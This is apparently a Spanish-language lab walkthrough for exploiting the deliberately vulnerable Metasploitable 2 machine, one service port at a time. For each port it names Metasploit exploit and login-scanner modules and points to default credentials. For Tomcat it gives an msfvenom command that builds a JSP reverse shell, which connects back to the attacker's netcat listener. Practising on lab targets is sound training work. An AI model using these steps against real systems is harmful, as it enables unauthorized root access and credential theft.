Máquina Metasploitable 2
Puerto 21 (FTP):
Para este puerto nos encontramos que tiene activado el ftp Anonymous login, y si nos
fijamos en su versión tiene la vsftpd 2.3.4 la cual es vulnerable.
Podemos usar el módulo de metasploit unix/ftp/vsftpd_234_backdoor.
Configuramos el RHOSTS con la IP de la máquina víctima y ejecutamos el comando run
o exploit. De esta manera obtenemos una shell como root.
Puerto 22 (SSH):
Podemos encontrar usuarios validos usando los scripts de nmap, para ello ejecutamos
el siguiente comando:
Esto mismo se puede realizar desde msfconsole con scanner/ssh/ssh_login
Debemos configurar, el RHOSTS, el VERBOSE, el PASS_FILE y el USER_FILE, una vez
configurado estos parámetros, ejecutamos el exploit.
Puerto 2121 (PROFTPD)
Vamos a usar también msfconsole y en este caso el payload (scanner/ftp/ftp_login)
Configuramos, el RHOSTS, el RPORT lo ponemos en 2121, ponemos el USER_FILE y el
PASS_FILE, el USER_AS_PASS lo ponemos en true, y ejecutamos el exploit.
Puerto 23 (TELNET):
Usamos el siguiente payload scanner/telnet/telnet_login y lo configuramos.
Una vez configurado lanzamos el exploit.
Podemos capturar el tráfico con wireshark y vemos lo siguiente:
Vemos la contraseña introducida en texto claro.
Puerto 25 (SMTP):
Para este caso utilizaremos el siguiente payload para enumerarlo
scanner/smtp/smtp_enum
Solo debemos configurar el RHOSTS y el USER_FILE
Puerto 3306 (Mysql):
Usaremos el siguiente payload scanner/mysql/mysql_login
Sin embargo, me da este error
Puerto 80 (http):
Al entrar en la página vemos ya por defecto credenciales en texto claro.
Si vemos la versión de http con este payload scanner/http/http_version
Vemos que la versión es Powered by PHP/5.2.4-2ubuntu5.10
Usaremos este payload exploit/multi/http/php_cgi_arg_injection
Configuramos el RHOSTS y ejecutamos el exploit, con esto obtenemos una sesión de
meterpreter.
Puerto 8009-8180 (TOMCAT)
Para explotar el TOMCAT y obtener acceso, usaremos el siguiente payload.
En este caso hice la explotación de forma manual, ya que con metasploit he tenido
problemas.
Primero entramos en tomcat mánager con las credenciales tomcat/tomcat
En mi caso he usado este payload msfvenom -p java/jsp_shell_reverse_tcp LHOST=”Ip
maquina atacante” LPORT=”Puerto de escucha” -f war > [Link]
Una vez generado el payload, toca subirlo en tomcat mánager.
Hacemos click en browse donde pone Select WAR file to upload.
Una vez subido nos ponemos en escucha con netcat por el puerto 443 y hacemos click
en /reverse.
Puerto 6667 (Unreal IRC)
Para explotar esta vulnerabilidad usamos el siguiente exploit en metasploit.
unix/irc/unreal_ircd_3281_backdoor)
Lo configuramos, y lo ejecutamos obteniendo la shell.
Puerto 6000 (X11):
Para realizar un escaneo de esta vulnerabilidad con metasploit usaremos este payload
scanner/x11/open_x11
En este caso nos sale Access Denied.
Puertos 512,513,514 (Rlogin):
Con esta vulnerabilidad podemos comunicarnos remotamente desde cualquier
máquina, logeandonos como root.
Puerto 5900 (VNC):
Para explotar la vulnerabilidad de este puerto usaremos el siguiente payload en
metasploit.
scanner/vnc/vnc_login
Obtenemos como contraseña password, ejecutamos el comando vncviewer seguido
de la ip de la maquina víctima, e introducimos esa contraseña.
De esta manera obtenemos una consola como root.
Puerto 3632 (Distcc):
Para este puerto vamos a utilizar este payload.
unix/misc/distcc_exec
Una vez cargado este exploit, configuramos el RHOSTS
También debemos cambiar el tipo de payload a este otro.
cmd/unix/reverse
Ejecutamos el comando run y obtenemos la shell.
Puerto 1524 (ingreslock):
Gracias a esta vulnerabilidad nos podemos conectar directamente con root mediante
netcat.
Puerto 139,445 (Samba):
Para estos puertos usaremos el siguiente exploit:
multi/samba/usermap_script
Configuramos el RHOSTS y ejecutamos el comando run.
Obtenemos una shell como root.